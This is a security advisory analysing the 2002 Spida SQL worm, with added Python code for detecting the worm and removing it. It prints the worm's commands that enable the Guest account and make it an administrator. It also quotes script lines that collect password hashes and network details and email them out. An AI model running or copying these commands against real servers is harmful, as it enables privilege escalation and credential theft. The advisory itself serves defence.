ANALYSIS: Spida or Digispid.B.Worm SQL Worm
5/22/2002 12:00:00 AM
Default installations of Microsoft SQL Server
The SQL worm (AKA: Spida, Digispid.B.Worm) infects by inserting itself into MSSQL database servers with no password protecting the SA (System Administrator) account. The worm executes commands on the vulnerable server using the "xp_cmdshell" General Extended Procedure, and the commands it executes activate and configure the Windows "Guest" account so it can be used to copy files over to the vulnerable machine via Windows file sharing. After the files have been copied over, they are "hidden" and the worm goes into a cleanup phase. It deactivates the Guest account and changes the password for the SA account.
The worm then creates a file containing details about the network interfaces, database, and Windows account password hashes. This file is emailed to firstname.lastname@example.org, which we are guessing is an email box created by the worm's author. Finally, the target machine begins to scan for other machines and continues the chain of infection.
As mentioned before, the SQL worm spreads by inserting itself into MSSQL database servers that have no password protecting the SA (System Administrator) account. It executes commands in a command shell (cmd.exe) using the "xp_cmdshell" General Extended Procedure.
The commands the worm executes are as follows:
net user guest /active:yes
net user guest [random 4 byte lowercase alpha string]
net localgroup administrators guest /add
net group "Domain Admins" guest /add
This activates the Guest account, changes the password for the Guest account, and adds it into higher privilege groups.
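The four commands above are a compact signature for this worm. As an added example that is not part of the original advisory, the following Python matches them against command lines captured from xp_cmdshell auditing (the sample list is constructed, and the audit source is an assumption):

```python
import re

# Constructed sample of command lines as they might be captured from
# xp_cmdshell auditing on a SQL Server host (not real trace data).
SAMPLE_COMMANDS = [
    "net user guest /active:yes",
    "net user guest kqzp",
    "net localgroup administrators guest /add",
    'net group "Domain Admins" guest /add',
    "dir c:\\temp",
    "net user guest /active:no",
]

# Signatures derived from the four commands the advisory lists. The
# password step is matched by its shape: exactly four lowercase letters.
SIGNATURES = {
    "guest_enabled": re.compile(r"^net\s+user\s+guest\s+/active:yes$", re.I),
    "guest_password_set": re.compile(r"^net\s+user\s+guest\s+[a-z]{4}$"),
    "guest_local_admin": re.compile(
        r"^net\s+localgroup\s+administrators\s+guest\s+/add$", re.I),
    "guest_domain_admin": re.compile(
        r'^net\s+group\s+"?domain admins"?\s+guest\s+/add$', re.I),
}

def classify(cmd):
    """Return the signature name a single command line matches, or None."""
    cmd = cmd.strip()
    for name, pattern in SIGNATURES.items():
        if pattern.match(cmd):
            return name
    return None

def detect_spida_sequence(commands):
    """Return (signature names seen, in order) and whether all four were seen."""
    seen = []
    for cmd in commands:
        name = classify(cmd)
        if name and name not in seen:
            seen.append(name)
    return seen, len(seen) == len(SIGNATURES)

if __name__ == "__main__":
    print(detect_spida_sequence(SAMPLE_COMMANDS))
```

Any one of the four lines on its own is suspicious on a database server; all four in quick succession from the SQL Server service account is the worm's footprint.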
Next, the worm "unhides" its files on the infected "attacker" machine, then it copies itself into the Windows system directory of the vulnerable MSSQL server. You will not be able to see these files normally because they are marked "hidden". You can use the "attrib" command from the command shell (cmd.exe) to unhide and delete them. The description and location of each file are listed below:
Used to run commands on a remote MSSQL server:
Command Line Emailer:
Core worm processing script - contains functionality for scanning, backdooring, and the sending of retrieved data to the assumed author of the worm:
Used for initial worm infection once a vulnerable host is identified:
Collects general information about local databases:
Timing library used by the worm:
SAM library used by pwdump.exe:
Grabs password hashes for Windows user accounts; these are not the actual passwords, but retrieving the actual password is very possible if the existing passwords are weak:
Note: %WinDir% is just an environment variable for your Windows base directory. The shell will replace this with the name of your registered Windows directory. This is usually "Winnt" or "Windows".
Next the worm will deactivate the Guest account and remove it from the Administrators and "Domain Admins" groups. After the Guest account is removed, the worm will also change the SA account password to a random, four-byte lowercase alpha string. The worm instance on the target machine now creates a file containing various information about the server it has just infected. After the file is assembled it is mailed to the assumed author of the worm. This process is done with the following commands:
shell.Run("cmd /c ipconfig /all > send.txt", 0, true);
shell.Run("cmd /c cscript sqldir.js . sa " + WScript.Arguments(0) + " /r3s >> send.txt", 0, true);
shell.Run("cmd /c pwdump2 >> send.txt", 0, true);
shell.Run("clemail.exe -bodyfile send.txt -to email@example.com -subject SystemData-" + WScript.Arguments(0), 0, true);
Now the worm triggers the infected target machine to start infecting other machines in the same manner that it was infected.
Free SQL Worm Scanner from eEye Digital Security
Trend Micro Analysis
Change your MSSQL Server "SA" password immediately and disable the Windows Guest account. If you currently use the Guest account then you should change its password. You should also change the passwords for every other account on an infected machine, because upon infection the password hashes for each account were collected by the worm and emailed to the worm's author. The passwords may have been retrieved by the author or by anyone in the communication channel between him and you. ;)
Delete the following registry keys:
Delete the worm files:
attrib -h %WinDir%\system32\drivers\services.exe
attrib -h %WinDir%\system32\sqlexec.js
attrib -h %WinDir%\system32\clemail.exe
attrib -h %WinDir%\system32\sqlprocess.js
attrib -h %WinDir%\system32\sqlinstall.bat
attrib -h %WinDir%\system32\sqldir.js
attrib -h %WinDir%\system32\run.js
attrib -h %WinDir%\system32\timer.dll
attrib -h %WinDir%\system32\samdump.dll
attrib -h %WinDir%\system32\pwdump2.exe
Unregister the timer.dll used for scan and infection timing:
regsvr32 /u TIMER.DLL
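The removal steps above can be checked and scripted from the output of "attrib". As an added example that is not part of the original advisory, the following Python parses attrib output (the sample is constructed, with %WinDir% assumed to be C:\WINNT), reports which of the listed worm files are present and hidden, and builds the unhide, unregister and delete commands in the right order:

```python
import re

# Worm file names from the advisory, relative to %WinDir%\system32 (lowercase).
WORM_FILES = {
    "drivers\\services.exe", "sqlexec.js", "clemail.exe", "sqlprocess.js",
    "sqlinstall.bat", "sqldir.js", "run.js", "timer.dll", "samdump.dll",
    "pwdump2.exe",
}

# Constructed sample of `attrib` output: attribute letters, then the full path.
SAMPLE_ATTRIB_OUTPUT = """\
A    H       C:\\WINNT\\system32\\sqlexec.js
A    H       C:\\WINNT\\system32\\drivers\\services.exe
A            C:\\WINNT\\system32\\notepad.exe
A    H       C:\\WINNT\\system32\\timer.dll
"""

# Attribute letters (may include R, A, S, H) followed by a drive-rooted path.
ATTRIB_LINE = re.compile(r"^([A-Z ]*?)\s*([A-Za-z]:\\.+)$")

def find_worm_files(attrib_output):
    """Map each worm file present in the attrib output to whether it is hidden."""
    found = {}
    for line in attrib_output.splitlines():
        m = ATTRIB_LINE.match(line)
        if not m:
            continue
        flags, path = m.group(1), m.group(2).strip()
        low = path.lower()
        idx = low.find("\\system32\\")
        if idx == -1:
            continue
        rel = low[idx + len("\\system32\\"):]
        if rel in WORM_FILES:
            found[path] = "H" in flags.upper()
    return found

def cleanup_commands(found):
    """Build the removal steps the advisory describes for the files found."""
    cmds = []
    for path, hidden in sorted(found.items()):
        if hidden:
            cmds.append(f"attrib -h {path}")       # unhide first, as the advisory does
        if path.lower().endswith("\\timer.dll"):
            cmds.append(f"regsvr32 /u {path}")     # unregister before deleting
        cmds.append(f"del {path}")
    return cmds

if __name__ == "__main__":
    print("\n".join(cleanup_commands(find_worm_files(SAMPLE_ATTRIB_OUTPUT))))
```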
1) Change the "SA" account password on any MSSQL database server that you administer so that it is not blank or easy to guess.
2) Get all of the latest Service Packs and Hotfixes from Microsoft to help prevent general worm infection.
Copyright ©1998-2011 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.